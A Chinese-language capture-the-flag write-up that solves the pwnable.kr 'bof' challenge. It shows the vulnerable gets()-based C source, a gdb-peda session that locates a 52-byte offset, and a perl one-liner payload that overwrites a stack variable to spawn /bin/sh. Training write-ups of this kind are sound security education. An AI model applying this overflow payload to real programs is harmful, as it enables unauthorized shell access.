bof_WriteUp(pwnable.kr_bof)缓冲区溢出简单利用

bof(pwnable.kr_bof)缓冲区溢出简单利用

题目传送门：http://pwnable.kr/play.php

下载连接中的源代码和二进制文件后，查看源代码如下

#include 
#include 
#include 
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

判断这个时考察缓冲区溢出的题目，漏洞产生原因时gets()函数对输入的数据长度没有做检查，导致溢出，上gdb分析

root@kali-linux:~/文档/PWN/pwnable.kr/3.bof# gdb -q ./bof

warning: build/bdist.linux-x86_64/wheel/peda/peda.py: No such file or directory
Reading symbols from ./bof...(no debugging symbols found)...done.
gdb-peda$ pattern_creat 150
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'
gdb-peda$ r
Starting program: /root/文档/PWN/pwnable.kr/3.bof/bof 
overflow me : 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA
Nah..
*** stack smashing detected ***: /root/文档/PWN/pwnable.kr/3.bof/bof terminated

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x31414162 ('bAA1')
EBX: 0xf7fcf000 --> 0x1bef0 
ECX: 0xffffd210 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
EDX: 0xf7ffd4fc --> 0x0 
ESI: 0xffffc9e0 --> 0x0 
EDI: 0xffffc9e0 --> 0x0 
EBP: 0xffffcab8 --> 0xffffcb18 --> 0xf7fa4000 --> 0x1b2db0 
ESP: 0xffffc910 --> 0x40000000 ('')
EIP: 0xf7fc6886 (cmp    WORD PTR [eax],0xb858)
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7fc687e:  xchg   ax,ax
   0xf7fc6880:  mov    ecx,DWORD PTR [eax+0x48]
   0xf7fc6883:  mov    eax,DWORD PTR [eax+0x4c]
=> 0xf7fc6886:  cmp    WORD PTR [eax],0xb858
   0xf7fc688b:  je     0xf7fc6b28
   0xf7fc6891:  cmp    BYTE PTR [eax],0xb8
   0xf7fc6894:  jne    0xf7fc68b0
   0xf7fc6896:  cmp    DWORD PTR [eax+0x1],0xad
[------------------------------------stack-------------------------------------]
0000| 0xffffc910 --> 0x40000000 ('')
0004| 0xffffc914 --> 0x0 
0008| 0xffffc918 --> 0xffffc960 --> 0x0 
0012| 0xffffc91c --> 0xf7fcf000 --> 0x1bef0 
0016| 0xffffc920 --> 0x0 
0020| 0xffffc924 --> 0x0 
0024| 0xffffc928 --> 0x0 
0028| 0xffffc92c --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7fc6886 in ?? () from /lib/i386-linux-gnu/libgcc_s.so.1
gdb-peda$ pattern_offset AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA
AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA found at offset: 52

判断溢出的偏移位数为52，而在代码中：

if(key == 0xcafebabe){
        system("/bin/sh");
    }

需要将key所在的内存数据替换为0xcafebabe，而通过file命令我们可以知道本程序为32位程序，采用小端序，因此我们只需构造”A”*52+”“\xbe\xba\xfe\xca”来进行溢出

root@kali-linux:~/文档/PWN/pwnable.kr/3.bof# file bof
bof: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ed643dfe8d026b7238d3033b0d0bcc499504f273, not stripped

poc

(perl -e 'print "A"x52 . "\xbe\xba\xfe\xca\n"'; cat -) | ./bof

即可运行/bin/sh来cat flag:

daddy, I just pwned a buFFer :)